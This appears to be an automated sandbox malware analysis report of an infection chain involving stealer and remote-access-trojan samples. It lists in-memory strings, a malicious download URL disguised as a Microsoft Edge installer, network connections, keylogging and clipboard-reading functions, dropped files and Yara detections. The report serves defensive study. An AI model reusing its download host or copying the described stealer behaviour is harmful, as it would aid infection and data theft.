Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.00000000032A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
Source: RegAsm.exe, 0000000B.00000002.3526374520.0000000002C24000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.3526374520.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.3526374520.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3014501020.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7
Source: RegAsm.exe, 0000000B.00000002.3526374520.0000000002C24000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.3526374520.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.3526374520.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3014501020.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002C81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
Source: RegAsm.exe, 0000000B.00000002.3526374520.0000000002C24000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.3526374520.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.3526374520.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3014501020.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8
Source: RegAsm.exe, 0000000B.00000002.3526374520.0000000002C24000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.3526374520.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.3526374520.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3014501020.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002C81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
Source: RegAsm.exe, 0000000B.00000002.3526374520.0000000002C24000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.3526374520.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.3526374520.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3014501020.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002C81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9
Source: RegAsm.exe, 0000000B.00000002.3526374520.0000000002C24000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.3526374520.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.3526374520.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, VCIo8iTrPf.exe, 00000011.00000002.3014501020.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002C81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.00000000032A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
Source: stealc_default2.exe, 00000017.00000002.3113843128.000000006958D000.00000002.00000001.01000000.0000001C.sdmp, svchost015.exe, 0000001E.00000002.3461869295.0000000068EFD000.00000002.00000001.01000000.0000001C.sdmp String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: stealc_default2.exe, 00000017.00000002.3113552451.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000017.00000002.3087042883.000000001B497000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3459068339.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3426007293.000000001B02A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: needmoney.exe, 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000000.2988347504.0000000000401000.00000020.00000001.01000000.00000019.sdmp String found in binary or memory: http://www.x-ways.net/order
Source: needmoney.exe, 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000000.2988347504.0000000000401000.00000020.00000001.01000000.00000019.sdmp String found in binary or memory: http://www.x-ways.net/order.html-d.htmlS
Source: needmoney.exe, 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000000.2988347504.0000000000401000.00000020.00000001.01000000.00000019.sdmp String found in binary or memory: http://www.x-ways.net/winhex/license
Source: needmoney.exe, 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000000.2988347504.0000000000401000.00000020.00000001.01000000.00000019.sdmp String found in binary or memory: http://www.x-ways.net/winhex/license-d-f.htmlS
Source: needmoney.exe, 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000000.2988347504.0000000000401000.00000020.00000001.01000000.00000019.sdmp String found in binary or memory: http://www.x-ways.net/winhex/subscribe
Source: needmoney.exe, 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000000.2988347504.0000000000401000.00000020.00000001.01000000.00000019.sdmp String found in binary or memory: http://www.x-ways.net/winhex/subscribe-d.htmlU
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.000000000381B000.00000004.00000800.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3376541999.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: penis.exe, 00000019.00000002.2964689421.0000000002E91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ip.s
Source: penis.exe, 00000019.00000002.2964689421.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, crypted.exe, 0000001C.00000002.3027013594.00000000038C5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ip.sb/ip
Source: penis.exe, 00000019.00000002.2964689421.0000000002E91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ip.sb/ipH
Source: stealc_default2.exe, 00000017.00000002.3105854817.0000000027513000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3442582690.000000002709F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: stealc_default2.exe, 00000017.00000002.3105854817.0000000027513000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3442582690.000000002709F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.000000000381B000.00000004.00000800.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3376541999.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001081000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ep
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001081000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.epnacl
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.000000000381B000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000017.00000002.3070584798.0000000001081000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3376541999.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.000000000381B000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000017.00000002.3070584798.0000000001081000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3376541999.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: stealc_default2.exe, 00000017.00000002.3105854817.0000000027513000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3442582690.000000002709F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: stealc_default2.exe, 00000017.00000002.3105854817.0000000027513000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3442582690.000000002709F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: penis.exe, 00000019.00000002.2964689421.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://discord.com/api/v9/users/
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.000000000381B000.00000004.00000800.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3376541999.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: svchost015.exe, 0000001E.00000002.3376541999.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.000000000381B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtabS
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.000000000381B000.00000004.00000800.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3376541999.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: axplong.exe, 00000006.00000002.3518419435.0000000000F15000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3518419435.0000000000E47000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://eijfrhegrtbrfcd.online/
Source: axplong.exe, 00000006.00000002.3518419435.0000000000E47000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://eijfrhegrtbrfcd.online/D9
Source: axplong.exe, 00000006.00000002.3518419435.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3526057863.0000000005960000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://eijfrhegrtbrfcd.online/download/Microsoft-Edge.exe
Source: axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://eijfrhegrtbrfcd.online/download/Microsoft-Edge.exe.exeP
Source: axplong.exe, 00000006.00000002.3518419435.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://eijfrhegrtbrfcd.online/download/Microsoft-Edge.exe789
Source: needmoney.exe, 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000000.2988347504.0000000000401000.00000020.00000001.01000000.00000019.sdmp String found in binary or memory: https://github.com/tesseract-ocr/tessdata/
Source: svchost015.exe, 0000001E.00000002.3442582690.000000002709F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: needmoney.exe, 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: svchost015.exe, 0000001E.00000003.3250767941.000000002D132000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: svchost015.exe, 0000001E.00000003.3250767941.000000002D132000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: stealc_default2.exe, 00000017.00000002.3105854817.0000000027513000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3442582690.000000002709F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001081000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3376541999.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.000000000381B000.00000004.00000800.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3376541999.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: svchost015.exe, 0000001E.00000002.3324897526.00000000005AD000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: svchost015.exe, 0000001E.00000003.3250767941.000000002D132000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: svchost015.exe, 0000001E.00000002.3324897526.00000000005AD000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: svchost015.exe, 0000001E.00000002.3324897526.00000000005AD000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: svchost015.exe, 0000001E.00000003.3250767941.000000002D132000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: svchost015.exe, 0000001E.00000003.3250767941.000000002D132000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: needmoney.exe, 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.ssl.com/repository0
Source: stealc_default2.exe, 00000017.00000002.3105854817.0000000027513000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3442582690.000000002709F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: needmoney.exe, 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000000.2988347504.0000000000401000.00000020.00000001.01000000.00000019.sdmp String found in binary or memory: https://www.x-ways.net/forensics/x-tensions.html
Source: needmoney.exe, 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000000.2988347504.0000000000401000.00000020.00000001.01000000.00000019.sdmp String found in binary or memory: https://www.x-ways.net/forensics/x-tensions.htmlf
Source: needmoney.exe, 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000000.2988347504.0000000000401000.00000020.00000001.01000000.00000019.sdmp String found in binary or memory: https://www.x-ways.net/winhex/forum/
Source: needmoney.exe, 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000000.2988347504.0000000000401000.00000020.00000001.01000000.00000019.sdmp String found in binary or memory: https://www.x-ways.net/winhex/forum/www.x-ways.net/winhex/templates/www.x-ways.net/dongle_protection
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49644
Source: unknown Network traffic detected: HTTP traffic on port 49647 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49673
Source: unknown Network traffic detected: HTTP traffic on port 49635 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49638 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49644 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49638
Source: unknown Network traffic detected: HTTP traffic on port 49646 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49647
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49635
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49646
Source: unknown HTTPS traffic detected: 172.67.162.108:443 -> 192.168.2.6:49635 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.108:443 -> 192.168.2.6:49638 version: TLS 1.2
Source: unknown HTTPS traffic detected: 37.140.192.213:443 -> 192.168.2.6:49644 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.194:443 -> 192.168.2.6:49646 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.194:443 -> 192.168.2.6:49647 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.194:443 -> 192.168.2.6:49673 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004F9000 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 16_2_004F9000
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004F9000 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 16_2_004F9000
Installs a raw input device (often for capturing keystrokes)
Source: penis.exe, 00000019.00000002.2964689421.00000000030EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: GetRawInputData memstr_f19ef452-d
Yara detected Keylogger Generic
Source: Yara match File source: 30.0.svchost015.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: needmoney.exe PID: 3360, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost015.exe PID: 5268, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\svchost015.exe, type: DROPPED
Drops certificate files (DER)
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe File created: C:\Users\user\AppData\Local\Temp\TmpFBD.tmp Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Temp\TmpA462.tmp Jump to dropped file
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe File created: C:\Users\user\AppData\Local\Temp\TmpB588.tmp Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Temp\TmpFC46.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe File created: C:\Users\user\AppData\Local\Temp\TmpFCE.tmp Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Temp\TmpA451.tmp Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Temp\TmpFC35.tmp Jump to dropped file
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe File created: C:\Users\user\AppData\Local\Temp\TmpB578.tmp Jump to dropped file

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 25.0.penis.exe.ac0000.0.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 38.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 35.2.rstxdhuj.exe.38efdb0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 35.2.rstxdhuj.exe.38a1590.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000023.00000002.3231251960.00000000038A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000023.00000002.3116851630.0000000002971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000026.00000002.3514611255.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, type: DROPPED Matched rule: Detects zgRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\penis[1].exe, type: DROPPED Matched rule: Detects zgRAT Author: ditekSHen
.NET source code contains very large array initializations
Source: gold[1].exe.6.dr, MoveAngles.cs Large array initialization: MoveAngles: array initializer size 311296
Source: gold.exe.6.dr, MoveAngles.cs Large array initialization: MoveAngles: array initializer size 311296
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: .idata
Source: axplong.exe.0.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .rsrc
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: c6f71c9f40.exe.6.dr Static PE information: section name:
Source: c6f71c9f40.exe.6.dr Static PE information: section name: .rsrc
Source: c6f71c9f40.exe.6.dr Static PE information: section name: .idata
Source: c6f71c9f40.exe.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: 3ab68b6f1f.exe.6.dr Static PE information: section name:
Source: 3ab68b6f1f.exe.6.dr Static PE information: section name: .idata
Source: 3ab68b6f1f.exe.6.dr Static PE information: section name:
PE file has a writeable .text section
Source: stealc_default2[1].exe.6.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: stealc_default2.exe.6.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Creates files inside the system directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\axplong.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe File created: C:\Windows\Tasks\Hkbsse.job
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_00243068 6_2_00243068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_00204CF0 6_2_00204CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_00237D83 6_2_00237D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_0024765B 6_2_0024765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_00204AF0 6_2_00204AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_00248720 6_2_00248720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_00246F09 6_2_00246F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_0024777B 6_2_0024777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_00242BD0 6_2_00242BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_02A725D8 11_2_02A725D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_02A7DC74 11_2_02A7DC74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_0648A6B8 11_2_0648A6B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_064867D8 11_2_064867D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_06483F50 11_2_06483F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_0648A688 11_2_0648A688
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_06486FE8 11_2_06486FE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_06486FF8 11_2_06486FF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_06486FF4 11_2_06486FF4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00402320 15_2_00402320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_004050C0 15_2_004050C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00420470 15_2_00420470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0040FCF0 15_2_0040FCF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00419D19 15_2_00419D19
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0041951B 15_2_0041951B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00415635 15_2_00415635
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0041DEC3 15_2_0041DEC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00404F00 15_2_00404F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0040CF8F 15_2_0040CF8F
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_00507600 16_2_00507600
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_0050004B 16_2_0050004B
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004C1000 16_2_004C1000
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_0050B020 16_2_0050B020
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_005050E0 16_2_005050E0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004F40F5 16_2_004F40F5
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004C91F0 16_2_004C91F0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004C12A7 16_2_004C12A7
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004EA345 16_2_004EA345
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_0050B300 16_2_0050B300
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_004CA3C0 16_2_004CA3C0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 16_2_00509390 16_2_00509390
